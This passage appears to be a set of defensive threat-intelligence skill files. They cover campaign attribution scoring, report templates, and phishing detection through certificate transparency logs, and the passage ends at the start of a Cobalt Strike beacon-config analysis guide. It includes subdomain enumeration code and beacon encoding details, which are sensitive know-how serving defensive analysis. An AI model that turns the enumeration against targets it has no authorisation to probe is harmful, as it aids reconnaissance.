            campaign_b_infra.get("domains", [])
        ),
        "shared_asns": set(campaign_a_infra.get("asns", [])).intersection(
            campaign_b_infra.get("asns", [])
        ),
        "shared_registrars": set(campaign_a_infra.get("registrars", [])).intersection(
            campaign_b_infra.get("registrars", [])
        ),
    }

    overlap_score = 0
    if overlap["shared_ips"]:
        overlap_score += 30
    if overlap["shared_domains"]:
        overlap_score += 25
    if overlap["shared_asns"]:
        overlap_score += 15
    if overlap["shared_registrars"]:
        overlap_score += 10

    return {
        "overlap": {k: list(v) for k, v in overlap.items()},
        "overlap_score": overlap_score,
        "assessment": "STRONG" if overlap_score >= 40 else "MODERATE" if overlap_score >= 20 else "WEAK",
    }
```
|
||||
|
||||
### Step 3: TTP Comparison Across Campaigns
|
||||
|
||||
```python
from attackcti import attack_client

def compare_campaign_ttps(campaign_techniques, known_actor_techniques):
    """Compare campaign TTPs against known threat actor profiles."""
    campaign_set = set(campaign_techniques)
    actor_set = set(known_actor_techniques)

    common = campaign_set.intersection(actor_set)
    unique_campaign = campaign_set - actor_set
    unique_actor = actor_set - campaign_set

    jaccard = len(common) / len(campaign_set.union(actor_set)) if campaign_set.union(actor_set) else 0

    return {
        "common_techniques": sorted(common),
        "common_count": len(common),
        "unique_to_campaign": sorted(unique_campaign),
        "unique_to_actor": sorted(unique_actor),
        "jaccard_similarity": round(jaccard, 3),
        "overlap_percentage": round(len(common) / len(campaign_set) * 100, 1) if campaign_set else 0,
    }
```
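A worked example makes the two metrics from this step concrete. The sketch below recomputes them on small technique sets; the ATT&CK IDs are real, but the campaign and actor profiles are invented for illustration and do not describe any actual group.

```python
def jaccard(a: set[str], b: set[str]) -> float:
    """Jaccard similarity: shared items divided by all distinct items."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0


if __name__ == "__main__":
    # Hypothetical technique sets for illustration only.
    campaign = {"T1566.001", "T1059.001", "T1071.001", "T1027"}
    actor = {"T1566.001", "T1059.001", "T1071.001", "T1105", "T1053.005"}

    shared = campaign & actor
    print(sorted(shared))
    print(round(jaccard(campaign, actor), 3))           # 3 shared / 6 distinct = 0.5
    print(round(len(shared) / len(campaign) * 100, 1))  # 3 of 4 campaign techniques = 75.0
```

The two numbers answer different questions. Jaccard drops as the actor's known profile grows, even when every campaign technique matches, whereas the overlap percentage measures only how much of the campaign the profile explains. Commonly used techniques inflate both, so neither should be read as attribution on its own.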
|
||||
|
||||
### Step 4: Generate Attribution Report
|
||||
|
||||
```python
from datetime import date

def generate_attribution_report(analyzer):
    """Generate structured attribution assessment report."""
    rankings = analyzer.rank_hypotheses()

    report = {
        # Stamp the report with the date it is generated rather than a fixed value
        "assessment_date": date.today().isoformat(),
        "total_evidence_items": len(analyzer.evidence),
        "hypotheses_evaluated": len(analyzer.hypotheses),
        "rankings": rankings,
        "primary_attribution": rankings[0] if rankings else None,
        "evidence_summary": [
            {
                "index": i,
                "category": e["category"],
                "description": e["description"],
                "confidence": e["confidence"],
            }
            for i, e in enumerate(analyzer.evidence)
        ],
    }

    return report
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Evidence collection covers all six attribution categories
|
||||
- ACH matrix properly evaluates evidence against competing hypotheses
|
||||
- Infrastructure overlap analysis identifies shared indicators
|
||||
- TTP comparison uses ATT&CK technique IDs for precision
|
||||
- Attribution confidence levels are properly justified
|
||||
- Report includes alternative hypotheses and false flag considerations
|
||||
|
||||
## References
|
||||
|
||||
- [Diamond Model of Intrusion Analysis](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf)
|
||||
- [MITRE ATT&CK Groups](https://attack.mitre.org/groups/)
|
||||
- [Analysis of Competing Hypotheses](https://www.cia.gov/static/9a5f1162fd0932c29e985f0159f56c07/Tradecraft-Primer-apr09.pdf)
|
||||
- [Threat Attribution Framework](https://www.mandiant.com/resources/reports)
|
||||
@@ -0,0 +1,39 @@
|
||||
# Campaign Attribution Analysis Report Template
|
||||
|
||||
## Report Metadata
|
||||
| Field | Value |
|-------|-------|
| Report ID | CTI-YYYY-NNNN |
| Date | YYYY-MM-DD |
| Classification | TLP:AMBER |
| Analyst | [Name] |
| Confidence | High/Moderate/Low |
|
||||
|
||||
## Executive Summary
|
||||
[Brief overview of key findings and their significance]
|
||||
|
||||
## Key Findings
|
||||
1. [Finding 1 with supporting evidence]
|
||||
2. [Finding 2 with supporting evidence]
|
||||
3. [Finding 3 with supporting evidence]
|
||||
|
||||
## Detailed Analysis
|
||||
### Finding 1
|
||||
- **Evidence**: [Description of evidence]
|
||||
- **Confidence**: High/Moderate/Low
|
||||
- **MITRE ATT&CK**: [Relevant technique IDs]
|
||||
- **Impact Assessment**: [Potential impact to organization]
|
||||
|
||||
## Indicators of Compromise
|
||||
| Type | Value | Context | Confidence |
|------|-------|---------|-----------|
| | | | |
|
||||
|
||||
## Recommendations
|
||||
1. **Immediate**: [Actions requiring immediate attention]
|
||||
2. **Short-term**: [Actions within 1-2 weeks]
|
||||
3. **Long-term**: [Strategic improvements]
|
||||
|
||||
## References
|
||||
- [Source 1]
|
||||
- [Source 2]
|
||||
@@ -0,0 +1,24 @@
|
||||
# Standards and Frameworks Reference
|
||||
|
||||
## Applicable Standards
|
||||
- **STIX 2.1**: Structured Threat Information eXpression for CTI data representation
|
||||
- **TAXII 2.1**: Transport protocol for sharing CTI over HTTPS
|
||||
- **MITRE ATT&CK**: Adversary tactics, techniques, and procedures taxonomy
|
||||
- **Diamond Model**: Intrusion analysis framework (Adversary, Capability, Infrastructure, Victim)
|
||||
- **Traffic Light Protocol (TLP)**: Information sharing classification (CLEAR, GREEN, AMBER, RED)
|
||||
|
||||
## MITRE ATT&CK Relevance
|
||||
- Technique mapping for threat actor behavior classification
|
||||
- Data sources for detection capability assessment
|
||||
- Mitigation strategies linked to specific techniques
|
||||
|
||||
## Industry Frameworks
|
||||
- NIST Cybersecurity Framework (CSF) 2.0 - Identify function
|
||||
- ISO 27001:2022 - A.5.7 Threat Intelligence
|
||||
- FIRST Standards - TLP, CSIRT, vulnerability coordination
|
||||
|
||||
## References
|
||||
- [STIX 2.1 Specification](https://docs.oasis-open.org/cti/stix/v2.1/stix-v2.1.html)
|
||||
- [MITRE ATT&CK](https://attack.mitre.org/)
|
||||
- [Diamond Model Paper](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf)
|
||||
- [NIST CSF 2.0](https://www.nist.gov/cyberframework)
|
||||
@@ -0,0 +1,31 @@
|
||||
# Campaign Attribution Analysis Workflows
|
||||
|
||||
## Workflow 1: Collection and Analysis
|
||||
```
[Intelligence Sources] --> [Data Collection] --> [Analysis] --> [Reporting]
         |                        |                  |              |
         v                        v                  v              v
OSINT/HUMINT/SIGINT       Normalize/Enrich    Assess/Correlate  Disseminate
```
|
||||
|
||||
### Steps:
|
||||
1. **Planning**: Define intelligence requirements and collection priorities
|
||||
2. **Collection**: Gather data from relevant sources
|
||||
3. **Processing**: Normalize data formats and filter noise
|
||||
4. **Analysis**: Apply analytical frameworks and correlate findings
|
||||
5. **Production**: Generate intelligence products and reports
|
||||
6. **Dissemination**: Share with stakeholders via appropriate channels
|
||||
7. **Feedback**: Collect consumer feedback to refine future collection
|
||||
|
||||
## Workflow 2: Continuous Monitoring
|
||||
```
|
||||
[Watchlist] --> [Automated Monitoring] --> [Change Detection] --> [Alert/Update]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Define Watchlist**: Identify indicators, actors, and topics to monitor
|
||||
2. **Configure Monitoring**: Set up automated collection from relevant sources
|
||||
3. **Change Detection**: Identify new or changed intelligence
|
||||
4. **Assessment**: Evaluate significance of changes
|
||||
5. **Alerting**: Notify stakeholders of significant intelligence updates
|
||||
6. **Archive**: Store intelligence for historical analysis and trending
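The change detection step in this workflow reduces to comparing two snapshots of the watchlist's indicators. A minimal sketch, assuming indicators are held as plain strings. `detect_changes` is a hypothetical helper, and the sample values use documentation-reserved addresses and domains.

```python
def detect_changes(previous: set[str], current: set[str]) -> dict[str, list[str]]:
    """Report indicators that appeared or disappeared between two snapshots."""
    return {
        "added": sorted(current - previous),
        "removed": sorted(previous - current),
    }


if __name__ == "__main__":
    last_week = {"192.0.2.10", "c2.example.org"}
    today = {"192.0.2.10", "198.51.100.7"}
    changes = detect_changes(last_week, today)
    print(changes["added"])    # ['198.51.100.7']
    print(changes["removed"])  # ['c2.example.org']
```

Removed indicators are worth recording alongside new ones, since infrastructure that goes quiet can mark the end of a campaign phase.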
|
||||
@@ -0,0 +1,169 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Campaign Attribution Evidence Analysis Script
|
||||
|
||||
Implements structured attribution analysis:
|
||||
- Analysis of Competing Hypotheses (ACH) matrix
|
||||
- Infrastructure overlap scoring
|
||||
- TTP similarity comparison using ATT&CK
|
||||
- Evidence weighting and confidence assessment
|
||||
|
||||
Requirements:
|
||||
pip install attackcti stix2 requests
|
||||
|
||||
Usage:
|
||||
python process.py --evidence evidence.json --hypotheses actors.json --output report.json
|
||||
python process.py --compare-ttps --campaign campaign_techs.json --actor APT29
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
from collections import defaultdict
|
||||
|
||||
|
||||
class AttributionEngine:
|
||||
"""Structured attribution analysis using ACH methodology."""
|
||||
|
||||
def __init__(self):
|
||||
self.evidence = []
|
||||
self.hypotheses = {}
|
||||
|
||||
def load_evidence(self, filepath):
|
||||
with open(filepath) as f:
|
||||
self.evidence = json.load(f)
|
||||
|
||||
def add_evidence(self, category, description, value, confidence):
|
||||
self.evidence.append({
|
||||
"id": len(self.evidence),
|
||||
"category": category,
|
||||
"description": description,
|
||||
"value": value,
|
||||
"confidence": confidence,
|
||||
})
|
||||
|
||||
def add_hypothesis(self, actor_name, supporting_info=""):
|
||||
self.hypotheses[actor_name] = {
|
||||
"info": supporting_info,
|
||||
"assessments": {},
|
||||
"score": 0,
|
||||
}
|
||||
|
||||
def evaluate(self, evidence_id, actor_name, assessment):
|
||||
"""Evaluate evidence against hypothesis: C=consistent, I=inconsistent, N=neutral."""
|
||||
weight = self.evidence[evidence_id]["confidence"]
|
||||
self.hypotheses[actor_name]["assessments"][evidence_id] = assessment
|
||||
|
||||
if assessment == "C":
|
||||
self.hypotheses[actor_name]["score"] += weight
|
||||
elif assessment == "I":
|
||||
self.hypotheses[actor_name]["score"] -= weight * 2
|
||||
|
||||
def generate_ach_matrix(self):
|
||||
matrix = {"evidence": [], "hypotheses": {}}
|
||||
for e in self.evidence:
|
||||
matrix["evidence"].append({
|
||||
"id": e["id"],
|
||||
"category": e["category"],
|
||||
"description": e["description"],
|
||||
})
|
||||
|
||||
for actor, data in self.hypotheses.items():
|
||||
matrix["hypotheses"][actor] = {
|
||||
"assessments": data["assessments"],
|
||||
"score": data["score"],
|
||||
"consistent": sum(1 for a in data["assessments"].values() if a == "C"),
|
||||
"inconsistent": sum(1 for a in data["assessments"].values() if a == "I"),
|
||||
"neutral": sum(1 for a in data["assessments"].values() if a == "N"),
|
||||
}
|
||||
|
||||
return matrix
|
||||
|
||||
def rank(self):
|
||||
ranked = sorted(
|
||||
self.hypotheses.items(), key=lambda x: x[1]["score"], reverse=True
|
||||
)
|
||||
results = []
|
||||
for name, data in ranked:
|
||||
incon = sum(1 for a in data["assessments"].values() if a == "I")
|
||||
confidence = "HIGH" if data["score"] >= 80 and incon == 0 else \
|
||||
"MODERATE" if data["score"] >= 40 else "LOW"
|
||||
results.append({
|
||||
"actor": name,
|
||||
"score": data["score"],
|
||||
"confidence": confidence,
|
||||
"inconsistent_count": incon,
|
||||
})
|
||||
return results
|
||||
|
||||
|
||||
def compare_ttp_similarity(campaign_techs, actor_techs):
    """Compare two ATT&CK technique ID lists via Jaccard similarity and campaign coverage."""
    campaign_set = set(campaign_techs)
    actor_set = set(actor_techs)
    common = campaign_set & actor_set
    union = campaign_set | actor_set

    jaccard = len(common) / len(union) if union else 0
    return {
        "common": sorted(common),
        "jaccard_similarity": round(jaccard, 3),
        "campaign_coverage": round(len(common) / len(campaign_set) * 100, 1) if campaign_set else 0,
    }
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Campaign Attribution Analysis")
|
||||
parser.add_argument("--evidence", help="Evidence JSON file")
|
||||
parser.add_argument("--hypotheses", help="Hypotheses JSON file")
|
||||
parser.add_argument("--compare-ttps", action="store_true")
|
||||
parser.add_argument("--campaign", help="Campaign techniques JSON")
|
||||
parser.add_argument("--actor", help="Actor name for ATT&CK lookup")
|
||||
parser.add_argument("--output", default="attribution_report.json")
|
||||
|
||||
args = parser.parse_args()
|
||||
engine = AttributionEngine()
|
||||
|
||||
if args.evidence and args.hypotheses:
|
||||
engine.load_evidence(args.evidence)
|
||||
with open(args.hypotheses) as f:
|
||||
hyps = json.load(f)
|
||||
for h in hyps:
|
||||
engine.add_hypothesis(h["name"], h.get("info", ""))
|
||||
for eid, assessment in h.get("evaluations", {}).items():
|
||||
engine.evaluate(int(eid), h["name"], assessment)
|
||||
|
||||
matrix = engine.generate_ach_matrix()
|
||||
rankings = engine.rank()
|
||||
report = {"ach_matrix": matrix, "rankings": rankings}
|
||||
print(json.dumps(report, indent=2))
|
||||
|
||||
with open(args.output, "w") as f:
|
||||
json.dump(report, f, indent=2)
|
||||
|
||||
elif args.compare_ttps and args.campaign:
|
||||
with open(args.campaign) as f:
|
||||
campaign_techs = json.load(f)
|
||||
|
||||
if args.actor:
|
||||
try:
|
||||
from attackcti import attack_client
|
||||
lift = attack_client()
|
||||
groups = lift.get_groups()
|
||||
group = next(
|
||||
(g for g in groups if args.actor.lower() in g.get("name", "").lower()),
|
||||
None,
|
||||
)
|
||||
if group:
|
||||
gid = group["external_references"][0]["external_id"]
|
||||
techs = lift.get_techniques_used_by_group(gid)
|
||||
actor_techs = [
|
||||
t["external_references"][0]["external_id"]
|
||||
for t in techs if t.get("external_references")
|
||||
]
|
||||
result = compare_ttp_similarity(campaign_techs, actor_techs)
|
||||
print(json.dumps(result, indent=2))
|
||||
except ImportError:
|
||||
print("[-] attackcti not installed")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,312 @@
|
||||
---
|
||||
name: analyzing-certificate-transparency-for-phishing
|
||||
description: Monitor Certificate Transparency logs using crt.sh and Certstream to detect phishing domains, lookalike certificates, and unauthorized certificate issuance targeting your organization.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [certificate-transparency, ct-logs, phishing, crt-sh, certstream, ssl, domain-monitoring, threat-intelligence]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Certificate Transparency for Phishing
|
||||
|
||||
## Overview
|
||||
|
||||
Certificate Transparency (CT) is an Internet security standard (RFC 6962) that records publicly trusted SSL/TLS certificates in public, append-only logs. Monitoring CT logs enables early detection of phishing domains that obtain certificates mimicking legitimate brands, unauthorized certificate issuance for domains you own, and certificate-based attack infrastructure. This skill covers querying CT logs via crt.sh, real-time monitoring with Certstream, building automated alerting for suspicious certificates, and integrating findings into threat intelligence workflows.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `requests`, `certstream`, `tldextract`, `Levenshtein` libraries
|
||||
- Access to crt.sh (https://crt.sh/) for historical CT log queries
|
||||
- Certstream (https://certstream.calidog.io/) for real-time monitoring
|
||||
- List of organization domains and brand keywords to monitor
|
||||
- Understanding of SSL/TLS certificate structure and issuance process
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Certificate Transparency Logs
|
||||
|
||||
CT logs are cryptographically assured, publicly auditable, append-only records of TLS certificate issuance. Major CAs (Let's Encrypt, DigiCert, Sectigo, Google Trust Services) submit all issued certificates to multiple CT logs. As of 2025, Chrome and Safari require CT for all publicly trusted certificates.
|
||||
|
||||
### Phishing Detection via CT
|
||||
|
||||
Attackers register lookalike domains and obtain free certificates (often from Let's Encrypt) to make phishing sites appear legitimate with HTTPS. CT monitoring can detect these early because the certificate is logged at issuance, which is often before the phishing campaign launches. That gap provides a window for proactive blocking.
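
A lookalike check can be sketched with a string-similarity ratio. The example below uses the standard library's `difflib.SequenceMatcher` as a stand-in for the `Levenshtein` package listed in the prerequisites, so the scores will differ somewhat from Levenshtein ratios. The function names and the 0.8 threshold are assumptions for illustration.

```python
from difflib import SequenceMatcher


def lookalike_score(candidate, brand):
    """Return a 0..1 similarity ratio between two domain labels."""
    return SequenceMatcher(None, candidate.lower(), brand.lower()).ratio()


def is_lookalike(candidate, brand, threshold=0.8):
    """Flag labels that are close to, but not identical to, the brand label."""
    if candidate.lower() == brand.lower():
        return False  # the brand's own label is not a lookalike
    return lookalike_score(candidate, brand) >= threshold


# "rn" imitating "m" is a common typosquatting trick
print(is_lookalike("mycornpany", "mycompany"))
print(is_lookalike("weather", "mycompany"))
```

A threshold this simple will produce false positives on short labels, so in practice it is usually combined with keyword matching and manual review.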
|
||||
|
||||
### crt.sh Database
|
||||
|
||||
crt.sh is a free web interface and PostgreSQL database operated by Sectigo that indexes CT logs. It supports wildcard searches (`%.example.com`), direct SQL queries, and JSON API responses. It tracks certificate issuance, expiration, and revocation across all major CT logs.
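
As a small sketch of the wildcard search described above, the query URL can be built with the standard library. The helper name `build_crtsh_url` is hypothetical; the `q`, `output`, and `exclude` parameters are the ones used in Step 1 of this skill.

```python
from urllib.parse import urlencode


def build_crtsh_url(domain, exclude_expired=True):
    """Build a crt.sh JSON query URL for certificates under a domain."""
    params = {"q": f"%.{domain}", "output": "json"}
    if exclude_expired:
        params["exclude"] = "expired"
    # urlencode percent-encodes the SQL-style '%' wildcard as '%25'
    return "https://crt.sh/?" + urlencode(params)


print(build_crtsh_url("example.com"))
```

Encoding the `%` wildcard matters when the URL is assembled by hand; `requests` does the same encoding when the values are passed through `params=`.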
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Query crt.sh for Certificate History
|
||||
|
||||
```python
|
||||
import requests
|
||||
import json
|
||||
from datetime import datetime
|
||||
import tldextract
|
||||
|
||||
class CTLogMonitor:
|
||||
CRT_SH_URL = "https://crt.sh"
|
||||
|
||||
def __init__(self, monitored_domains, brand_keywords):
|
||||
self.monitored_domains = monitored_domains
|
||||
self.brand_keywords = [k.lower() for k in brand_keywords]
|
||||
|
||||
def query_crt_sh(self, domain, include_expired=False):
|
||||
"""Query crt.sh for certificates matching a domain."""
|
||||
params = {
|
||||
"q": f"%.{domain}",
|
||||
"output": "json",
|
||||
}
|
||||
if not include_expired:
|
||||
params["exclude"] = "expired"
|
||||
|
||||
resp = requests.get(self.CRT_SH_URL, params=params, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
certs = resp.json()
|
||||
print(f"[+] crt.sh: {len(certs)} certificates for *.{domain}")
|
||||
return certs
|
||||
return []
|
||||
|
||||
def find_suspicious_certs(self, domain):
|
||||
"""Find certificates that may be phishing attempts."""
|
||||
certs = self.query_crt_sh(domain)
|
||||
suspicious = []
|
||||
|
||||
for cert in certs:
|
||||
common_name = cert.get("common_name", "").lower()
|
||||
name_value = cert.get("name_value", "").lower()
|
||||
issuer = cert.get("issuer_name", "")
|
||||
not_before = cert.get("not_before", "")
|
||||
not_after = cert.get("not_after", "")
|
||||
|
||||
# Check for exact domain matches (legitimate)
|
||||
extracted = tldextract.extract(common_name)
|
||||
cert_domain = f"{extracted.domain}.{extracted.suffix}"
|
||||
if cert_domain == domain:
|
||||
continue # Legitimate certificate
|
||||
|
||||
# Flag suspicious patterns
|
||||
flags = []
|
||||
if domain.replace(".", "") in common_name.replace(".", ""):
|
||||
flags.append("contains target domain string")
|
||||
if any(kw in common_name for kw in self.brand_keywords):
|
||||
flags.append("contains brand keyword")
|
||||
if "let's encrypt" in issuer.lower():
|
||||
flags.append("free CA (Let's Encrypt)")
|
||||
|
||||
if flags:
|
||||
suspicious.append({
|
||||
"common_name": cert.get("common_name", ""),
|
||||
"name_value": cert.get("name_value", ""),
|
||||
"issuer": issuer,
|
||||
"not_before": not_before,
|
||||
"not_after": not_after,
|
||||
"serial": cert.get("serial_number", ""),
|
||||
"flags": flags,
|
||||
"crt_sh_id": cert.get("id", ""),
|
||||
"crt_sh_url": f"https://crt.sh/?id={cert.get('id', '')}",
|
||||
})
|
||||
|
||||
print(f"[+] Found {len(suspicious)} suspicious certificates")
|
||||
return suspicious
|
||||
|
||||
monitor = CTLogMonitor(
|
||||
monitored_domains=["mycompany.com", "mycompany.org"],
|
||||
brand_keywords=["mycompany", "mybrand", "myproduct"],
|
||||
)
|
||||
suspicious = monitor.find_suspicious_certs("mycompany.com")
|
||||
for cert in suspicious[:5]:
|
||||
print(f" [{cert['common_name']}] Flags: {cert['flags']}")
|
||||
```
|
||||
|
||||
### Step 2: Real-Time Monitoring with Certstream
|
||||
|
||||
```python
|
||||
import certstream
|
||||
import Levenshtein
|
||||
import re
import tldextract  # used by _is_suspicious and _get_reason
|
||||
from datetime import datetime
|
||||
|
||||
class CertstreamMonitor:
|
||||
def __init__(self, watched_domains, brand_keywords, similarity_threshold=0.8):
|
||||
self.watched_domains = [d.lower() for d in watched_domains]
|
||||
self.brand_keywords = [k.lower() for k in brand_keywords]
|
||||
self.threshold = similarity_threshold
|
||||
self.alerts = []
|
||||
|
||||
def start_monitoring(self, max_alerts=100):
|
||||
"""Start real-time CT log monitoring."""
|
||||
print("[*] Starting Certstream monitoring...")
|
||||
print(f" Watching: {self.watched_domains}")
|
||||
print(f" Keywords: {self.brand_keywords}")
|
||||
|
||||
def callback(message, context):
|
||||
if message["message_type"] == "certificate_update":
|
||||
data = message["data"]
|
||||
leaf = data.get("leaf_cert", {})
|
||||
all_domains = leaf.get("all_domains", [])
|
||||
|
||||
for domain in all_domains:
|
||||
domain_lower = domain.lower().strip("*.")
|
||||
if self._is_suspicious(domain_lower):
|
||||
alert = {
|
||||
"domain": domain,
|
||||
"all_domains": all_domains,
|
||||
"issuer": leaf.get("issuer", {}).get("O", ""),
|
||||
"fingerprint": leaf.get("fingerprint", ""),
|
||||
"not_before": leaf.get("not_before", ""),
|
||||
"detected_at": datetime.now().isoformat(),
|
||||
"reason": self._get_reason(domain_lower),
|
||||
}
|
||||
self.alerts.append(alert)
|
||||
print(f" [ALERT] {domain} - {alert['reason']}")
|
||||
|
||||
if len(self.alerts) >= max_alerts:
|
||||
raise KeyboardInterrupt
|
||||
|
||||
try:
|
||||
certstream.listen_for_events(callback, url="wss://certstream.calidog.io/")
|
||||
except KeyboardInterrupt:
|
||||
print(f"\n[+] Monitoring stopped. {len(self.alerts)} alerts collected.")
|
||||
return self.alerts
|
||||
|
||||
def _is_suspicious(self, domain):
|
||||
"""Check if domain is suspicious relative to watched domains."""
|
||||
for watched in self.watched_domains:
|
||||
# Exact keyword match
|
||||
watched_base = watched.split(".")[0]
|
||||
if watched_base in domain and domain != watched:
|
||||
return True
|
||||
|
||||
# Levenshtein distance (typosquatting detection)
|
||||
domain_base = tldextract.extract(domain).domain
|
||||
similarity = Levenshtein.ratio(watched_base, domain_base)
|
||||
if similarity >= self.threshold and domain_base != watched_base:
|
||||
return True
|
||||
|
||||
# Brand keyword match
|
||||
for keyword in self.brand_keywords:
|
||||
if keyword in domain:
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
def _get_reason(self, domain):
|
||||
"""Determine why domain was flagged."""
|
||||
reasons = []
|
||||
for watched in self.watched_domains:
|
||||
watched_base = watched.split(".")[0]
|
||||
if watched_base in domain:
|
||||
reasons.append(f"contains '{watched_base}'")
|
||||
domain_base = tldextract.extract(domain).domain
|
||||
similarity = Levenshtein.ratio(watched_base, domain_base)
|
||||
if similarity >= self.threshold and domain_base != watched_base:
|
||||
reasons.append(f"similar to '{watched}' ({similarity:.0%})")
|
||||
for kw in self.brand_keywords:
|
||||
if kw in domain:
|
||||
reasons.append(f"brand keyword '{kw}'")
|
||||
return "; ".join(reasons) if reasons else "unknown"
|
||||
|
||||
cs_monitor = CertstreamMonitor(
|
||||
watched_domains=["mycompany.com"],
|
||||
brand_keywords=["mycompany", "mybrand"],
|
||||
similarity_threshold=0.75,
|
||||
)
|
||||
alerts = cs_monitor.start_monitoring(max_alerts=50)
|
||||
```
|
||||
|
||||
### Step 3: Enumerate Subdomains from CT Logs
|
||||
|
||||
```python
|
||||
def enumerate_subdomains_ct(domain):
|
||||
"""Discover all subdomains from Certificate Transparency logs."""
|
||||
params = {"q": f"%.{domain}", "output": "json"}
|
||||
resp = requests.get("https://crt.sh", params=params, timeout=30)
|
||||
|
||||
if resp.status_code != 200:
|
||||
return []
|
||||
|
||||
certs = resp.json()
|
||||
subdomains = set()
|
||||
for cert in certs:
|
||||
name_value = cert.get("name_value", "")
|
||||
for name in name_value.split("\n"):
|
||||
name = name.strip().lower()
|
||||
if name.endswith(f".{domain}") or name == domain:
|
||||
name = name.lstrip("*.")
|
||||
subdomains.add(name)
|
||||
|
||||
sorted_subs = sorted(subdomains)
|
||||
print(f"[+] CT subdomain enumeration for {domain}: {len(sorted_subs)} subdomains")
|
||||
return sorted_subs
|
||||
|
||||
subdomains = enumerate_subdomains_ct("example.com")
|
||||
for sub in subdomains[:20]:
|
||||
print(f" {sub}")
|
||||
```
|
||||
|
||||
### Step 4: Generate CT Intelligence Report
|
||||
|
||||
```python
|
||||
def generate_ct_report(suspicious_certs, certstream_alerts, domain):
|
||||
report = f"""# Certificate Transparency Intelligence Report
|
||||
## Target Domain: {domain}
|
||||
## Generated: {datetime.now().isoformat()}
|
||||
|
||||
## Summary
|
||||
- Suspicious certificates found: {len(suspicious_certs)}
|
||||
- Real-time alerts triggered: {len(certstream_alerts)}
|
||||
|
||||
## Suspicious Certificates (crt.sh)
|
||||
| Common Name | Issuer | Flags | crt.sh Link |
|
||||
|------------|--------|-------|-------------|
|
||||
"""
|
||||
for cert in suspicious_certs[:20]:
|
||||
flags = "; ".join(cert.get("flags", []))
|
||||
report += (f"| {cert['common_name']} | {cert['issuer'][:30]} "
|
||||
f"| {flags} | [View]({cert['crt_sh_url']}) |\n")
|
||||
|
||||
report += f"""
|
||||
## Real-Time Certstream Alerts
|
||||
| Domain | Issuer | Reason | Detected |
|
||||
|--------|--------|--------|----------|
|
||||
"""
|
||||
for alert in certstream_alerts[:20]:
|
||||
report += (f"| {alert['domain']} | {alert['issuer']} "
|
||||
f"| {alert['reason']} | {alert['detected_at'][:19]} |\n")
|
||||
|
||||
report += """
|
||||
## Recommendations
|
||||
1. Add flagged domains to DNS sinkhole / web proxy blocklist
|
||||
2. Submit takedown requests for confirmed phishing domains
|
||||
3. Monitor CT logs continuously for new certificate registrations
|
||||
4. Implement CAA DNS records to restrict certificate issuance for your domains
|
||||
5. Deploy DMARC to prevent email spoofing from lookalike domains
|
||||
"""
|
||||
with open(f"ct_report_{domain.replace('.','_')}.md", "w") as f:
|
||||
f.write(report)
|
||||
print(f"[+] CT report saved")
|
||||
return report
|
||||
|
||||
generate_ct_report(suspicious, alerts if 'alerts' in dir() else [], "mycompany.com")
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- crt.sh queries return certificate data for target domains
|
||||
- Suspicious certificates identified based on lookalike patterns
|
||||
- Certstream real-time monitoring detects new phishing certificates
|
||||
- Subdomain enumeration produces comprehensive list from CT logs
|
||||
- Alerts generated with reason classification
|
||||
- CT intelligence report created with actionable recommendations
|
||||
|
||||
## References
|
||||
|
||||
- [crt.sh Certificate Search](https://crt.sh/)
|
||||
- [Certstream Real-Time CT Monitor](https://certstream.calidog.io/)
|
||||
- [River Security: CT Logs for Attack Surface Discovery](https://riversecurity.eu/finding-attack-surface-and-fraudulent-domains-via-certificate-transparency-logs/)
|
||||
- [Let's Encrypt: Certificate Transparency Logs](https://letsencrypt.org/docs/ct-logs/)
|
||||
- [SSLMate Cert Spotter](https://sslmate.com/certspotter/)
|
||||
- [CyberSierra: CT Logs as Early Warning System](https://cybersierra.co/blog/ssl-certificate-transparency-logs/)
|
||||
@@ -0,0 +1,360 @@
|
||||
---
|
||||
name: analyzing-cobalt-strike-beacon-configuration
|
||||
description: Extract and analyze Cobalt Strike beacon configuration from PE files and memory dumps to identify C2 infrastructure, malleable profiles, and operator tradecraft.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [cobalt-strike, beacon, c2, malware-analysis, config-extraction, threat-hunting, red-team-tools]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Cobalt Strike Beacon Configuration
|
||||
|
||||
## Overview
|
||||
|
||||
Cobalt Strike is a commercial adversary simulation tool widely abused by threat actors for post-exploitation operations. Beacon payloads contain embedded configuration data that reveals C2 server addresses, communication protocols, sleep intervals, jitter values, malleable C2 profile settings, watermark identifiers, and encryption keys. Extracting this configuration from PE files, shellcode, or memory dumps is critical for incident responders to map attacker infrastructure and attribute campaigns. The beacon configuration is XOR-encoded using a single byte (0x69 for version 3, 0x2e for version 4) and stored in a Type-Length-Value (TLV) format within the .data section.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `dissect.cobaltstrike`, `pefile`, `yara-python`
|
||||
- SentinelOne CobaltStrikeParser (`parse_beacon_config.py`)
|
||||
- Hex editor (010 Editor, HxD) for manual inspection
|
||||
- Understanding of PE file format and XOR encoding
|
||||
- Memory dump acquisition tools (Volatility3, WinDbg)
|
||||
- Network analysis tools (Wireshark) for C2 traffic correlation
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Beacon Configuration Structure
|
||||
|
||||
